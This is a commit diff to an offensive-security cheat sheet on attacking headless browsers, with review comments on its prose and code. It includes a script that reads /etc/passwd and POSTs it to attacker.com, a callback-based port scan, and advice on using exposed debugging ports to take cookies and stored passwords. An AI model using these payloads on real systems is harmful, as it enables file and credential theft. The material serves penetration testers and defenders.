Headless Browser + JSON Jackson

Swissky
2025-07-02 22:23:13 +02:00
parent aaf6bdf394
commit 3fd2f8c481
3 changed files with 192 additions and 7 deletions


@@ -7,10 +7,11 @@
* [Headless Commands](#headless-commands)
* [Local File Read](#local-file-read)
* [Debugging Port](#debugging-port)
* [Remote Debugging Port](#remote-debugging-port)
* [Network](#network)
* [Port Scanning](#port-scanning)
* [DNS Rebinding](#dns-rebinding)
* [CVE](#cve)
* [References](#references)
## Headless Commands
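Review bot: the table of contents now lists both `* [Debugging Port](#debugging-port)` and `* [Remote Debugging Port](#remote-debugging-port)`, but the body in this same commit leaves `## Debugging Port` as an empty heading directly above `## Remote Debugging Port`. Drop the stale `Debugging Port` entry together with the empty heading, or make one a subsection of the other, so the anchor does not point at a heading with no content.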
@@ -37,6 +38,31 @@ Example of headless browsers commands:
## Local File Read
### Insecure Flags
If the target is launched with the `--allow-file-access` option
```ps1
google-chrome-stable --disable-gpu --headless=new --no-sandbox --no-first-run --disable-web-security -allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt --user-data-dir
```
Since the file access is allowed, an atacker can create and expose an HTML file which captures the content of the `/etc/passwd` file.
```js
<script>
async function getFlag(){
response = await fetch("file:///etc/passwd");
flag = await response.text();
fetch("https://attacker.com/", { method: "POST", body: flag})
};
getFlag();
</script>
```
### PDF Rendering
Consider a scenario where a headless browser captures a copy of a webpage and exports it to PDF, while the attacker has control over the URL being processed.
Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site/file.html`
* Javascript Redirect
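Review bot: the intro line `If the target is launched with the `--allow-file-access` option` has no main clause and names a single flag, while the command below also passes `--disable-web-security`, `-allow-file-access-from-files` (single dash, unlike every other flag) and a bare `--user-data-dir` with no path; state which option the `fetch("file:///etc/passwd")` demo depends on so a reader auditing a deployment knows which flags to remove, and fix `atacker`. In the snippet, `response` and `flag` are assigned without `let`/`const` (implicit globals), the `};` after the function declaration is a stray semicolon, and the fence is tagged `js` although the content is a `<script>` element, so `html` would be the accurate tag.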
@@ -61,7 +87,9 @@ Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site
</html>
```
## Debugging Port
## Remote Debugging Port
The Remote Debugging Port in a headless browser (like Headless Chrome or Chromium) is a TCP port that exposes the browsers DevTools Protocol so external tools (or scripts) can connect and control the browser remotely. It usually listen on port **9222** but it can be changed with `--remote-debugging-port=`.
**Target**: `google-chrome-stable --headless=new --remote-debugging-port=XXXX ./index.html`
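Review bot: `## Debugging Port` is now an empty section immediately followed by `## Remote Debugging Port`; remove the old heading (and its TOC entry) rather than leaving a blank anchor. In the new paragraph, `browsers DevTools Protocol` needs an apostrophe (`browser's`) and `It usually listen` should read `It usually listens`. Since this section is the one a defender will read, consider also stating which address the port binds to by default and what changes that, as that is the control that decides whether `--remote-debugging-port=XXXX` is reachable beyond the host.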
@@ -77,10 +105,21 @@ Target: `google-chrome-stable --headless[=(new|old)] --print-to-pdf https://site
* Connect and interact with the browser: `chrome://inspect/#devices`, `opera://inspect/#devices`
* Kill the currently running browser and use the `--restore-last-session` to get access to the user's tabs
* Dump cookies:
* Stored data: `chrome://settings`
* Data stored in the settings (username, passwords, token): `chrome://settings`
* Port Scan: In a loop open `http://localhost:<port>/json/new?http://callback.example.com?port=<port>`
* Leak UUID: Iframe: `http://127.0.0.1:<port>/json/version`
```json
{
"Browser": "Chrome/136.0.7103.113",
"Protocol-Version": "1.3",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/136.0.0.0 Safari/537.36",
"V8-Version": "13.6.233.10",
"WebKit-Version": "537.36 (@76fa3c1782406c63308c70b54f228fd39c7aaa71)",
"webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/browser/d815e18d-57e6-4274-a307-98649a9e6b87"
}
```
* Local File Read: [pich4ya/chrome_remote_debug_lfi.py](https://gist.github.com/pich4ya/5e7d3d172bb4c03360112fd270045e05)
* Node inspector `--inspect` works like a `--remote-debugging-port`
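Review bot: `* Dump cookies:` is a bullet with no content, and the two bullets that follow (`Stored data: chrome://settings` and `Data stored in the settings (username, passwords, token): chrome://settings`) point at the same URL and say the same thing; fill in or remove the cookie bullet and merge the two `chrome://settings` lines (`usernames, passwords, tokens`). The `Leak UUID` bullet should say what is leaked: the browser id embedded in `webSocketDebuggerUrl` (`/devtools/browser/d815e18d-...`) of the `/json/version` response, which is what the JSON block beneath it illustrates and why exposure of that endpoint matters.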
@@ -122,6 +161,23 @@ Port Scanning: Timing attack
5. Chrome will attempt to connect to the IPv6 but as it will fail it will fallback to the IPv4
6. From top window, inject script into iframe to exfiltrate content
## CVE
Exploiting a headless browser using a known vulnerability (CVE) involves several steps, from vulnerability research to payload execution. Below is a structured breakdown of the process:
Identify the headless browser with the User-Agent, then choose an exploit targeting the browser's component: V8 engine, Blink renderer, Webkit, etc.
* Chrome CVE: [2024-9122 - WASM type confusion due to imported tag signature subtyping](https://issues.chromium.org/issues/365802567), [CVE-2025-5419 - Out of bounds read and write in V8](https://nvd.nist.gov/vuln/detail/CVE-2025-5419)
* Firefox : [CVE-2024-9680 - Use after free](https://nvd.nist.gov/vuln/detail/CVE-2024-9680)
The `--no-sandbox` option disables the sandbox feature of the renderer process.
```js
const browser = await puppeteer.launch({
args: ['--no-sandbox']
});
```
## References
* [Browser based Port Scanning with JavaScript - Nikolai Tschacher - January 10, 2021](https://incolumitas.com/2021/01/10/browser-based-port-scanning/)
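Review bot: `Below is a structured breakdown of the process:` promises steps that never follow; either add the breakdown or replace the sentence with what is actually there (identify the browser from the User-Agent, then pick a CVE matching its component). The first Chrome link label is missing its prefix (`2024-9122` next to `CVE-2025-5419`), and `Firefox :` has a stray space. The `--no-sandbox` paragraph needs one sentence tying it to this section: with the renderer sandbox disabled, a renderer bug of the kind listed above runs unsandboxed on the host, which is why a bot launched with `args: ['--no-sandbox']` should be flagged in review. The puppeteer snippet also uses top-level `await` without any `import`/`require` of `puppeteer`; wrap it in an async function or add the import so it is correct as written.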
@@ -131,3 +187,4 @@ Port Scanning: Timing attack
* [Node inspector/CEF debug abuse - HackTricks - July 18, 2024](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse)
* [Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely - wunderwuzzi - April 28, 2020](https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/)
* [Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari - Daniel Thatcher - December 6, 2023](https://www.intruder.io/research/split-second-dns-rebinding-in-chrome-and-safari)
* [Too Lazy to get XSS? Then use n-days to get RCE in the Admin bot - Jopraveen - March 2, 2025](https://jopraveen.github.io/web-hackthebot/)